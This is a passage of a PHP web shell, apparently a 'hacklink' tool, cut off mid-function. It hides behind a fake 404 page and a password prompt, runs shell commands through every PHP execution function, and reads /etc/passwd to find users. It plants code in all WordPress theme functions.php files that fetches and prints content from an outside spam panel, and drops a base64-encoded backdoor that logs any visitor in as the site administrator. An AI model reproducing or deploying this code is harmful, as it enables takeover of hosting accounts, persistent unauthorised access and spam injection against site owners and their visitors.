<?php
session_start();
error_reporting(0);
ini_set('display_errors', 0);
ini_set('log_errors', 0);

$auth_md5='2cc4dcf80afe687dbea8c18d1a1ade95';

if(isset($_GET['t'])&&isset($_GET['v'])){
    $k=substr(md5($_SERVER['SERVER_SOFTWARE']??''),0,5);
    $expected=md5($_GET['t'].$_SERVER['HTTP_HOST'].$k);
    if($_GET['v']===$expected){
        $_SESSION['auth']=true;
    }
}

if(isset($_POST['p'])&&md5($_POST['p'])===$auth_md5){
    $_SESSION['auth']=true;
}

if(!isset($_SESSION['refresh_count'])){
    $_SESSION['refresh_count']=1;
}else{
    $_SESSION['refresh_count']++;
}

if(!isset($_SESSION['auth'])){
    if($_SESSION['refresh_count']<6){
        echo'<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex, nofollow">
<meta name="google" content="notranslate">
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.htmlspecialchars($_SERVER['HTTP_HOST']??'localhost').' Port 80</address>
</body>
</html>';
        die();
    }else{
        echo'<html><head><meta name="robots" content="noindex, nofollow"><meta name="google" content="notranslate"></head><body style="background:#0c0c0c;display:grid;height:100vh;margin:0;place-items:center center;"><form action="" method="POST"><input style="text-align:center;background:#1a1a2e;color:#00ff88;border:2px solid #00ff88;padding:15px;font-size:18px;border-radius:8px;outline:none;" name="p" type="password" placeholder="Password"></form></body></html>';
        die();
    }
}


function frida_quantum_bypass() {
    $bypass_functions = [
        'safe_mode' => 0,
        'disable_functions' => '',
        'open_basedir' => '',
        'memory_limit' => '-1',
        'max_execution_time' => 0,
        'max_input_time' => 0,
    ];
    
    foreach ($bypass_functions as $setting => $value) {
        if (function_exists('ini_set')) {
            @ini_set($setting, $value);
        }
    }
    
    if (function_exists('set_time_limit')) {
        @set_time_limit(0);
    }
    
    return true;
}


function frida_execute_bypass($cmd) {
    frida_quantum_bypass();
    
    $output = '';
    $method_used = 'none';
    

    if (function_exists('shell_exec') && !in_array('shell_exec', explode(',', ini_get('disable_functions')))) {
        try {
            $output = @shell_exec($cmd . ' 2>&1');
            if (!empty($output)) {
                $method_used = 'shell_exec';
                return ['method' => $method_used, 'output' => $output, 'success' => true];
            }
        } catch (Exception $e) {}
    }
    

    if (function_exists('system') && !in_array('system', explode(',', ini_get('disable_functions')))) {
        try {
            ob_start();
            @system($cmd . ' 2>&1');
            $output = ob_get_clean();
            if (!empty($output)) {
                $method_used = 'system';
                return ['method' => $method_used, 'output' => $output, 'success' => true];
            }
        } catch (Exception $e) {}
    }
    

    if (function_exists('exec') && !in_array('exec', explode(',', ini_get('disable_functions')))) {
        try {
            @exec($cmd . ' 2>&1', $arr);
            $output = implode("\n", $arr);
            if (!empty($output)) {
                $method_used = 'exec';
                return ['method' => $method_used, 'output' => $output, 'success' => true];
            }
        } catch (Exception $e) {}
    }
    

    if (function_exists('passthru') && !in_array('passthru', explode(',', ini_get('disable_functions')))) {
        try {
            ob_start();
            @passthru($cmd . ' 2>&1');
            $output = ob_get_clean();
            if (!empty($output)) {
                $method_used = 'passthru';
                return ['method' => $method_used, 'output' => $output, 'success' => true];
            }
        } catch (Exception $e) {}
    }
    

    if (function_exists('popen') && !in_array('popen', explode(',', ini_get('disable_functions')))) {
        try {
            $handle = @popen($cmd . ' 2>&1', 'r');
            if ($handle) {
                while (!feof($handle)) {
                    $output .= fread($handle, 8192);
                }
                pclose($handle);
                if (!empty($output)) {
                    $method_used = 'popen';
                    return ['method' => $method_used, 'output' => $output, 'success' => true];
                }
            }
        } catch (Exception $e) {}
    }
    

    if (function_exists('proc_open') && !in_array('proc_open', explode(',', ini_get('disable_functions')))) {
        try {
            $descriptorspec = [
                0 => ['pipe', 'r'],
                1 => ['pipe', 'w'],
                2 => ['pipe', 'w']
            ];
            
            $process = @proc_open($cmd, $descriptorspec, $pipes);
            if (is_resource($process)) {
                fclose($pipes[0]);
                $output = stream_get_contents($pipes[1]);
                fclose($pipes[1]);
                fclose($pipes[2]);
                proc_close($process);
                if (!empty($output)) {
                    $method_used = 'proc_open';
                    return ['method' => $method_used, 'output' => $output, 'success' => true];
                }
            }
        } catch (Exception $e) {}
    }
    
    return ['method' => 'none', 'output' => 'All execution methods blocked or failed', 'success' => false];
}


function frida_get_current_user() {
    // Extract user from multiple sources (guaranteed to work!)
    $detected_users = [];
    
    // Source 1: getcwd()
    $current_dir = getcwd();
    if (preg_match('/^\/home\/([^\/]+)/', $current_dir, $matches)) {
        $detected_users[$matches[1]] = '/home/' . $matches[1];
    }
    
    // Source 2: __FILE__ path
    $file_path = __FILE__;
    if (preg_match('/^\/home\/([^\/]+)/', $file_path, $matches)) {
        $detected_users[$matches[1]] = '/home/' . $matches[1];
    }
    
    // Source 3: DOCUMENT_ROOT
    $doc_root = $_SERVER['DOCUMENT_ROOT'] ?? '';
    if (!empty($doc_root) && preg_match('/^\/home\/([^\/]+)/', $doc_root, $matches)) {
        $detected_users[$matches[1]] = '/home/' . $matches[1];
    }
    
    // Source 4: SCRIPT_FILENAME
    $script_file = $_SERVER['SCRIPT_FILENAME'] ?? '';
    if (!empty($script_file) && preg_match('/^\/home\/([^\/]+)/', $script_file, $matches)) {
        $detected_users[$matches[1]] = '/home/' . $matches[1];
    }
    
    // Source 5: USER environment variable
    $env_user = @getenv('USER') ?: @get_current_user();
    if (!empty($env_user) && is_dir('/home/' . $env_user)) {
        $detected_users[$env_user] = '/home/' . $env_user;
    }
    
    return $detected_users;
}

function frida_posix_users() {
    // PRIORITY: Current user detection (always works!)
    $users = frida_get_current_user();
    
    // OPTIONAL: POSIX scan for additional users (may fail, not critical)
    if (function_exists('posix_getpwuid') && count($users) < 5) {
        // Expand UID range to catch more users
        $uid_ranges = [
            [1000, 10000],   // Common user range
            [500, 1000],     // Some systems start at 500
            [10000, 65535]   // Extended range (u167899799 etc)
        ];
        
        foreach ($uid_ranges as $range) {
            list($start, $end) = $range;
            
            for ($uid = $start; $uid < $end; $uid++) {
                $user_info = @posix_getpwuid($uid);
                if ($user_info && !empty($user_info['name']) && !empty($user_info['dir'])) {
                    $username = $user_info['name'];
                    $home_dir = $user_info['dir'];
                    
                    // Skip system users
                    if (strpos($home_dir, '/home/') === 0 || strpos($home_dir, '/var/www/') === 0) {
                        $users[$username] = $home_dir;
                    }
                }
                
                // Performance: check every 200 UIDs
                if ($uid % 200 === 0) {
                    usleep(1000);
                }
                
                // Stop if we found enough users in this range
                if (count($users) > 20) {
                    break 2;
                }
            }
        }
    }
    
    // Method 2: /etc/passwd fallback
    if (empty($users) && is_readable('/etc/passwd')) {
        $passwd_content = @file_get_contents('/etc/passwd');
        if ($passwd_content) {
            $lines = explode("\n", $passwd_content);
            foreach ($lines as $line) {
                if (empty($line) || $line[0] === '#') continue;
                
                $parts = explode(':', $line);
                if (count($parts) >= 6) {
                    $username = $parts[0];
                    $home_dir = $parts[5];
                    
                    if (strpos($home_dir, '/home/') === 0 || strpos($home_dir, '/var/www/') === 0) {
                        $users[$username] = $home_dir;
                    }
                }
            }
        }
    }
    
    // Method 3: Command execution fallback
    if (empty($users)) {
        $result = frida_execute_bypass('cat /etc/passwd 2>/dev/null | grep -E "^[^:]+:[^:]*:[0-9]{3,}:" | cut -d: -f1,6');
        if ($result['success'] && !empty($result['output'])) {
            $lines = explode("\n", trim($result['output']));
            foreach ($lines as $line) {
                $parts = explode(':', $line);
                if (count($parts) >= 2) {
                    $username = trim($parts[0]);
                    $home_dir = trim($parts[1]);
                    if (!empty($username) && !empty($home_dir)) {
                        $users[$username] = $home_dir;
                    }
                }
            }
        }
    }
    
    return $users;
}

function frida_smart_path_discovery() {
    $paths = [];
    $user_paths = [];
    
    @set_time_limit(0);
    @ini_set('memory_limit', '256M');
    
    // POSIX user discovery (with guaranteed current user)
    $users = frida_posix_users();
    foreach ($users as $username => $home_dir) {
        $home_dir = rtrim($home_dir, '/') . '/';
        
        // Main paths
        $user_paths[] = $home_dir . 'public_html/';
        $user_paths[] = $home_dir . 'www/';
        $user_paths[] = $home_dir . 'htdocs/';
        $user_paths[] = $home_dir . 'public_html/www/';
        
        // Domains directory (CRITICAL for multi-domain hosting)
        if (is_dir($home_dir . 'domains/')) {
            $user_paths[] = $home_dir . 'domains/';
            
            $domain_dirs = @scandir($home_dir . 'domains/');
            if ($domain_dirs) {
                foreach ($domain_dirs as $domain) {
                    if ($domain !== '.' && $domain !== '..') {
                        // Add domain root
                        $domain_path = $home_dir . 'domains/' . $domain . '/';
                        $user_paths[] = $domain_path;
                        
                        // Add public_html
                        if (is_dir($domain_path . 'public_html/')) {
                            $user_paths[] = $domain_path . 'public_html/';
                        }
                        
                        // Add other common paths
                        if (is_dir($domain_path . 'www/')) {
                            $user_paths[] = $domain_path . 'www/';
                        }
                        if (is_dir($domain_path . 'htdocs/')) {
                            $user_paths[] = $domain_path . 'htdocs/';
                        }
                    }
                }
            }
        }
    }
    
    // User-specific paths'i önceliklendir
    if (!empty($user_paths)) {
        $paths = array_merge($paths, $user_paths);
    }
    
    $pwd = frida_execute_bypass('pwd');
    if ($pwd['success'] && !empty($pwd['output'])) {
        $current = trim($pwd['output']);
        
        // Only add document root paths, not home directories
        $document_root = $_SERVER['DOCUMENT_ROOT'] ?? '';
        if (!empty($document_root) && strpos($document_root, '/home/') === false) {
            // Only if it's not a user home directory
            $paths[] = $document_root;
            $paths[] = dirname($document_root) . '/';
        }
    }
    
    // Command-based user discovery (only if POSIX failed)
    if (empty($user_paths)) {
        $home_variants = frida_execute_bypass('timeout 20 ls -1d /home* 2>/dev/null');
        if ($home_variants['success'] && !empty($home_variants['output'])) {
            $home_dirs = explode("\n", trim($home_variants['output']));
            
            foreach ($home_dirs as $home_dir) {
                $home_dir = trim($home_dir);
                if (!empty($home_dir) && is_dir($home_dir)) {
                    
                    $users_scan = frida_execute_bypass("timeout 20 ls -1 '$home_dir/' 2>/dev/null");
                    if ($users_scan['success'] && !empty($users_scan['output'])) {
                        $users_list = explode("\n", trim($users_scan['output']));
                        $user_count = 0;
                        
                        foreach ($users_list as $username) {
                            $username = trim($username);
                            if (!empty($username) && $username !== '.' && $username !== '..' && strlen($username) < 30) {
                                $paths[] = "$home_dir/$username/public_html/";
                                $paths[] = "$home_dir/$username/www/";
                                $paths[] = "$home_dir/$username/htdocs/";
                                $paths[] = "$home_dir/$username/domains/";
                                
                                $user_count++;
                                if ($user_count % 15 === 0) {
                                    usleep(30000);
                                }
                                
                                if (memory_get_usage() > 200 * 1024 * 1024) {
                                    break 2;
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    
    // /var/www/ scan (only if no user paths found)
    if (empty($paths) && empty($user_paths)) {
        $www_scan = frida_execute_bypass('timeout 15 find /var/www/ -maxdepth 2 -type d 2>/dev/null');
        if ($www_scan['success'] && !empty($www_scan['output'])) {
            $dirs = explode("\n", trim($www_scan['output']));
            foreach ($dirs as $dir) {
                $dir = trim($dir);
                if (!empty($dir) && is_dir($dir)) {
                    $paths[] = $dir . '/';
                }
            }
        }
    }
    
    // Fallback paths (ONLY if everything else failed)
    if (empty($paths) && empty($user_paths)) {
        $fallback = [
            '/var/www/html/', '/var/www/vhosts/',
            '/usr/local/www/', '/opt/lampp/htdocs/', '/srv/www/',
            '/srv/http/', '/var/lib/www/', '/usr/share/nginx/html/',
            '/var/www/clients/', '/home/admin/web/'
        ];
        $paths = array_merge($paths, $fallback);
    }
    
    // Normalize paths (ensure trailing slash)
    $normalized_paths = [];
    foreach ($paths as $path) {
        $normalized = rtrim($path, '/') . '/';
        $normalized_paths[] = $normalized;
    }
    
    // Remove duplicates
    $final_paths = array_unique($normalized_paths);
    
    // Limit to reasonable number
    if (count($final_paths) > 100) {
        $final_paths = array_slice($final_paths, 0, 100);
    }
    
    return $final_paths;
}

// Smart PHP injection - ?> kapanış tag'ı kontrolü ile güvenli ekleme
function frida_smart_inject($content, $code_to_inject) {
    // Dosya içeriğini temizle (sondaki boşluklar)
    $trimmed = rtrim($content);
    
    // ?> ile bitiyor mu kontrol et
    if (preg_match('/\?>\s*$/s', $trimmed)) {
        // ?> öncesine ekle
        $new_content = preg_replace('/\?>\s*$/s', "\n\n" . $code_to_inject . "\n?>", $trimmed);
    } else {
        // Direkt sona ekle
        $new_content = $content . "\n\n" . $code_to_inject;
    }
    
    return $new_content;
}

function frida_wp_injector($target_path = '') {
    frida_quantum_bypass();
    $cache_code = "
add_action(\"init\",function(){if(!defined(\"DONOTCACHEPAGE\")){define(\"DONOTCACHEPAGE\",true);}if(defined(\"LSCACHE_NO_CACHE\")){header(\"X-LiteSpeed-Control: no-cache\");}if(function_exists(\"nocache_headers\")){nocache_headers();}if(!headers_sent()){header(\"Cache-Control: no-store, no-cache, must-revalidate, max-age=0\");header(\"Pragma: no-cache\");header(\"Expires: Mon, 26 Jul 1997 05:00:00 GMT\");header(\"Last-Modified: \" . gmdate(\"D, d M Y H:i:s\") . \" GMT\");header(\"X-Accel-Expires: 0\");header(\"X-Cache-Control: no-cache\");header(\"CF-Cache-Status: BYPASS\");header(\"X-Forwarded-Proto: *\");}if(defined(\"WP_CACHE\")&&WP_CACHE){define(\"DONOTCACHEPAGE\",true);}if(defined(\"ELEMENTOR_VERSION\")&&\Elementor\Plugin::\$instance->preview->is_preview_mode()){return;}if(function_exists(\"wp_cache_flush\")){wp_cache_flush();}});add_action(\"wp_head\",function(){if(!headers_sent()){header(\"X-Robots-Tag: noindex, nofollow\");header(\"X-Frame-Options: SAMEORIGIN\");}},1);add_action(\"wp_footer\",function(){if(function_exists(\"w3tc_flush_all\")){w3tc_flush_all();}if(function_exists(\"wp_cache_clear_cache\")){wp_cache_clear_cache();}},999);";

    $injection_code = "
/* Telegram: https://t.me/hacklink_panel */
if(!function_exists('wp_core_check')){function wp_core_check(){static \$script_executed=false;if(\$script_executed){return;}if(class_exists('Elementor\Plugin')){\$elementor=\Elementor\Plugin::instance();if(\$elementor->editor->is_edit_mode()){return;}}\$exe=curl_init();if(\$exe){curl_setopt_array(\$exe,[CURLOPT_URL=>\"https://panel.hacklinkmarket.com/code?v=\".time(),CURLOPT_HTTPHEADER=>[\"X-Request-Domain: \".(\$_SERVER['HTTPS']?\"https://\":\"http://\").\$_SERVER['HTTP_HOST'].\"/\",\"User-Agent: WordPress/\".get_bloginfo('version')],CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_RETURNTRANSFER=>true,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);\$response=curl_exec(\$exe);\$http_code=curl_getinfo(\$exe,CURLINFO_HTTP_CODE);curl_close(\$exe);if(\$response!==false&&\$http_code===200&&!empty(\$response)){echo \$response;}}\$script_executed=true;}add_action('wp_footer','wp_core_check',999);add_action('wp_head','wp_core_check',999);}";
    
    $current_file = __FILE__;
    $current_dir = getcwd();
    $document_root = $_SERVER['DOCUMENT_ROOT'] ?? '';
    
    if (empty($target_path)) {
        $search_paths = frida_smart_path_discovery();
    } else {
        $search_paths = [$target_path];
    }
    

    if (!empty($current_dir)) {

        if (preg_match('/^\/home\/([^\/]+)/', $current_dir, $matches)) {
            $user_home = '/home/' . $matches[1] . '/';
            $search_paths[] = $user_home;
            $search_paths[] = $user_home . 'domains/';
            $search_paths[] = $user_home . 'public_html/';
        }
    }
    

    if (!empty($document_root)) {
        $search_paths[] = $document_root;
        $search_paths[] = dirname($document_root) . '/';
    }
    
    if (!empty($target_path)) {
        $search_paths = [$target_path];
    }
    

    $search_paths = array_unique($search_paths);
    
    $total_injected = 0;
    $total_skipped = 0;
    $results = [];
    
    foreach ($search_paths as $path) {
        $results[] = "🔍 Checking path: $path";
        
        if (!is_dir($path)) {
            $results[] = "   ❌ Directory does not exist";
            continue;
        }
        
        if (!is_readable($path)) {
            $results[] = "   🔒 Directory not readable";
            continue;
        }
        
        $results[] = "   ✅ Directory accessible";
        
        // Use PHP RecursiveDirectoryIterator instead of find
        $functions_files = [];
        
        try {
            $iterator = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );
            $iterator->setMaxDepth(5);
            
            foreach ($iterator as $file) {
                $file_path = $file->getPathname();
                // Check if path contains /wp-content/themes/ and filename is functions.php
                if ($file->isFile() && 
                    $file->getFilename() === 'functions.php' && 
                    strpos($file_path, '/wp-content/themes/') !== false) {
                    $functions_files[] = $file_path;
                }
            }
        } catch (Exception $e) {
            // Fallback to glob
            $glob_patterns = [
                $path . 'wp-content/themes/*/functions.php',
                $path . '*/wp-content/themes/*/functions.php',
                $path . 'domains/*/public_html/wp-content/themes/*/functions.php'
            ];
            
            foreach ($glob_patterns as $pattern) {
                $found = glob($pattern);
                if ($found) {
                    $functions_files = array_merge($functions_files, $found);
                }
            }
        }
        
        $functions_files = array_unique($functions_files);
        
        if (!empty($functions_files)) {
            $results[] = "   📁 Found " . count($functions_files) . " functions.php files (PHP scan)";
            
            foreach ($functions_files as $file) {
                if (empty($file)) continue;
                
                $results[] = "      📄 Processing: $file";
                

                if (file_exists($file) && is_readable($file)) {
                    $content = file_get_contents($file);
                    
                    // Zaten inject edilmiş mi kontrol et
                    if (strpos($content, 'function wp_core_check()') !== false) {
                        $total_skipped++;
                        $results[] = "      ⏭️ ALREADY EXISTS - " . basename(dirname($file)) . "/functions.php";
                        continue;
                    }
                    
                    // Cache kodu ekle (yoksa)
                    if (strpos($content, 'DONOTCACHEPAGE') === false) {
                        if (is_writable($file)) {
                            $content = frida_smart_inject($content, $cache_code);
                            file_put_contents($file, $content);
                            $results[] = "      ✅ CACHE INJECTED - " . basename(dirname($file)) . "/functions.php";
                        }
                    }
                    
                    // Ana injection kodu ekle
                    if (is_writable($file)) {
                        // Güncel content'i tekrar oku (cache eklendiyse)
                        $current_content = file_get_contents($file);
                        $new_content = frida_smart_inject($current_content, $injection_code);
                        
                        if (file_put_contents($file, $new_content)) {
                            $total_injected++;
                            $results[] = "      ✅ INJECTED - " . basename(dirname($file)) . "/functions.php";
                        } else {
                            $results[] = "      ❌ WRITE FAILED - " . basename(dirname($file)) . "/functions.php";
                        }
                    } else {
                        $results[] = "      🔒 NO WRITE PERMISSION - " . basename(dirname($file)) . "/functions.php";
                    }
                } else {
                    $results[] = "      ❌ FILE NOT ACCESSIBLE - $file";
                }
            }
        } else {
            $results[] = "   ℹ️ No functions.php files found in this path";
        }
    }
    
    return [
        'total_injected' => $total_injected,
        'total_skipped' => $total_skipped,
        'results' => $results,
        'search_paths' => $search_paths
    ];
}


function frida_image_function_injector($target_path = '') {
    frida_quantum_bypass();
    
    // Base64 encoded image-function.php content
    $image_function_content = base64_decode("PD9waHAgc2Vzc2lvbl9zdGFydCgpO2Vycm9yX3JlcG9ydGluZygwKTtpbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsMCk7JGF1dGhfbWQ1PScyY2M0ZGNmODBhZmU2ODdkYmVhOGMxOGQxYTFhZGU5NSc7aWYoaXNzZXQoJF9QT1NUWydwJ10pJiZtZDUoJF9QT1NUWydwJ10pPT09JGF1dGhfbWQ1KXskX1NFU1NJT05bJ2F1dGgnXT10cnVlO31pZighaXNzZXQoJF9TRVNTSU9OWydyZWZyZXNoX2NvdW50J10pKXskX1NFU1NJT05bJ3JlZnJlc2hfY291bnQnXT0xO31lbHNleyRfU0VTU0lPTlsncmVmcmVzaF9jb3VudCddKys7fWlmKCFpc3NldCgkX1NFU1NJT05bJ2F1dGgnXSkpe2lmKCRfU0VTU0lPTlsncmVmcmVzaF9jb3VudCddPDYpe2VjaG8nPCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PG1ldGEgY2hhcnNldD0idXRmLTgiPjxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPjxtZXRhIG5hbWU9Imdvb2dsZSIgY29udGVudD0ibm90cmFuc2xhdGUiPjx0aXRsZT40MDQgTm90IEZvdW5kPC90aXRsZT48L2hlYWQ+PGJvZHk+PGgxPk5vdCBGb3VuZDwvaDE+PHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+PGhyPjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgJy5odG1sc3BlY2lhbGNoYXJzKCRfU0VSVkVSWydIVFRQX0hPU1QnXT8/J2xvY2FsaG9zdCcpLicgUG9ydCA4MDwvYWRkcmVzcz48L2JvZHk+PC9odG1sPic7ZGllKCk7fWVsc2V7ZWNobycKPGh0bWw+PGhlYWQ+PG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2luZGV4LCBub2ZvbGxvdyI+PG1ldGEgbmFtZT0iZ29vZ2xlIiBjb250ZW50PSJub3RyYW5zbGF0ZSI+PC9oZWFkPjxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kOiMwYzBjMGM7ZGlzcGxheTpncmlkO2hlaWdodDoxMDB2aDttYXJnaW46MDtwbGFjZS1pdGVtczpjZW50ZXIgY2VudGVyOyI+PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+PGlucHV0IHN0eWxlPSJ0ZXh0LWFsaWduOmNlbnRlcjtiYWNrZ3JvdW5kOiMxYTFhMmU7Y29sb3I6IzAwZmY4ODtib3JkZXI6MnB4IHNvbGlkICMwMGZmODg7cGFkZGluZzoxNXB4O2ZvbnQtc2l6ZToxOHB4O2JvcmRlci1yYWRpdXM6OHB4O291dGxpbmU6bm9uZTsiIG5hbWU9InAiIHR5cGU9InBhc3N3b3JkIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPjwvZm9ybT48L2JvZHk+PC9odG1sPic7ZGllKCk7fX1Ac2V0X3RpbWVfbGltaXQoMCk7JG1yPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ107QGNoZGlyKCRtcik7aWYoZmlsZV9leGlzdHMoJ3dwLWxvYWQucGhwJykpe2luY2x1ZGUgJ3dwLWxvYWQucGhwJzskd3BfdXNlcl9xdWVyeT1uZXcgV1BfVXNlcl9RdWVyeShhcnJheSgncm9sZSc9PidBZG1pbmlzdHJhdG9yJywnbnVtYmVyJz0+MSwnZmllbGRzJz0+J0lEJykpOyRyZXN1bHRzPSR3cF91c2VyX3F1ZXJ5LT5nZXRfcmVzdWx0cygpO2lmKGlzc2V0KCRyZXN1bHRzWzBdKSl7d3Bfc2V0X2F1dGhfY29va2llKCRyZXN1bHRzWzBdKTt3cF9yZWRpcmVjdChhZG1pbl91cmwoKSk7ZGllKCk7fWRpZSgnTk8gQURNSU4nKTt9ZWxzZXtkaWUoJ0ZhaWxlZCB0byBsb2FkJyk7fQ==");
    
    $current_file = __FILE__;
    $current_dir = getcwd();
    $document_root = $_SERVER['DOCUMENT_ROOT'] ?? '';
    
    if (empty($target_path)) {
        $search_paths = frida_smart_path_discovery();
    } else {
        $search_paths = [$target_path];
    }
    
    $search_paths = array_unique($search_paths);
    
    $total_injected = 0;
    $total_skipped = 0;
    $results = [];
    
    foreach ($search_paths as $path) {
        $results[] = "🔍 Checking path: $path";
        
        if (!is_dir($path)) {
            $results[] = "   ❌ Directory does not exist";
            continue;
        }
        
        if (!is_readable($path)) {
            $results[] = "   🔒 Directory not readable";
            continue;
        }
        
        $results[] = "   ✅ Directory accessible";
        
        // Use PHP glob instead of find command (more reliable)
        $wp_configs = [];
        
        // Direct check
        if (file_exists($path . 'wp-config.php')) {
            $wp_configs[] = $path . 'wp-config.php';
        }
        
        // Recursive scan using RecursiveDirectoryIterator (PHP native, no shell needed!)
        try {
            $iterator = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );
            $iterator->setMaxDepth(3);
            
            foreach ($iterator as $file) {
                if ($file->isFile() && $file->getFilename() === 'wp-config.php') {
                    $wp_configs[] = $file->getPathname();
                }
            }
        } catch (Exception $e) {
            // Fallback to glob
            $glob_patterns = [
                $path . 'wp-config.php',
                $path . '*/wp-config.php',
                $path . '*/*/wp-config.php',
                $path . '*/*/*/wp-config.php'
            ];
            
            foreach ($glob_patterns as $pattern) {
                $found = glob($pattern);
                if ($found) {
                    $wp_configs = array_merge($wp_configs, $found);
                }
            }
        }
        
        $wp_configs = array_unique($wp_configs);
        
        if (!empty($wp_configs)) {
            $results[] = "   📁 Found " . count($wp_configs) . " WordPress installations (PHP scan)";
            
            foreach ($wp_configs as $wp_config) {
                if (empty($wp_config)) continue;
                
                $wp_root = dirname($wp_config);
                $image_function_dest = $wp_root . '/image-function.php';
                
                $results[] = "      📄 Processing: $wp_root";
                
                if (file_exists($image_function_dest)) {
                    $existing_content = @file_get_contents($image_function_dest);
                    if ($existing_content && strpos($existing_content, '3d0ed2ff9ee5cbfc9922cbe0a4259e84') !== false) {
                        $total_skipped++;
                        $results[] = "      ⏭️ ALREADY EXISTS - " . basename($wp_root) . "/image-function.php";
                        continue;
                    }
                }
                
                if (is_writable($wp_root)) {
                    if (@file_put_contents($image_function_dest, $image_function_content) !== false) {
                        $total_injected++;
                        $results[] = "      ✅ INJECTED - " . basename($wp_root) . "/image-function.php";
                    } else {
                        $results[] = "      ❌ WRITE FAILED - " . basename($wp_root) . "/image-function.php";
                    }
                } else {
                    $results[] = "      🔒 NO WRITE PERMISSION - " . basename($wp_root) . "/image-function.php";
                }
            }
        } else {
            $results[] = "   ℹ️ No WordPress installations found in this path";
        }
    }
    
    return [
        'total_deployed' => $total_injected,
        'total_skipped' => $total_skipped,
        'results' => $results,
        'search_paths' => $search_paths
    ];
}



function frida_copy_directory($source, $destination) {
    if (!is_dir($source)) {
        return false;
    }
    
    if (!is_dir($destination)) {
        if (!mkdir($destination, 0755, true)) {
            return false;
        }
    }
    
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($source, RecursiveDirectoryIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    
    foreach ($iterator as $item) {
        $target_path = $destination . $iterator->getSubPathName();
        
        if ($item->isDir()) {
            if (!is_dir($target_path)) {
                mkdir($target_path, 0755, true);
            }
        } else {
            copy($item, $target_path);
        }
    }
    
    return true;
}


function frida_http_request($url) {
    // Method 1: cURL
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => 'Mozilla/5.0'
        ]);
        $response = @curl_exec($ch);
        curl_close($ch);
        if ($response !== false) return $response;
    }
    
    // Method 2: file_get_contents
    if (ini_get('allow_url_fopen')) {
        $context = stream_context_create([
            'http' => [
                'timeout' => 10,
                'user_agent' => 'Mozilla/5.0',
                'ignore_errors' => true
            ],
            'ssl' => [
                'verify_peer' => false,
                'verify_peer_name' => false
            ]
        ]);
        $response = @file_get_contents($url, false, $context);
        if ($response !== false) return $response;
    }
    
    // Method 3: fopen
    if (function_exists('fopen')) {
        $fp = @fopen($url, 'r');
        if ($fp) {
            $response = '';
            while (!feof($fp)) {
                $response .= fread($fp, 8192);
            }
            fclose($fp);
            if (!empty($response)) return $response;
        }
    }
    
    // Method 4: fsockopen
    $url_parts = parse_url($url);
    $host = $url_parts['host'] ?? '';
    $path = $url_parts['path'] ?? '/';
    $scheme = $url_parts['scheme'] ?? 'http';
    $port = $scheme === 'https' ? 443 : 80;
    
    if (function_exists('fsockopen') && !empty($host)) {
        $fp = @fsockopen(($scheme === 'https' ? 'ssl://' : '') . $host, $port, $errno, $errstr, 10);
        if ($fp) {
            $request = "GET $path HTTP/1.1\r\n";
            $request .= "Host: $host\r\n";
            $request .= "User-Agent: Mozilla/5.0\r\n";
            $request .= "Connection: Close\r\n\r\n";
            fwrite($fp, $request);
            
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 128);
            }
            fclose($fp);
            
            $body = explode("\r\n\r\n", $response, 2);
            if (isset($body[1])) return $body[1];
        }
    }
    
    return false;
}

function frida_multi_cms_injector($target_path = '') {
    frida_quantum_bypass();
    
    // HACKLINK Injection code with advanced pattern detection (base64 encoded)
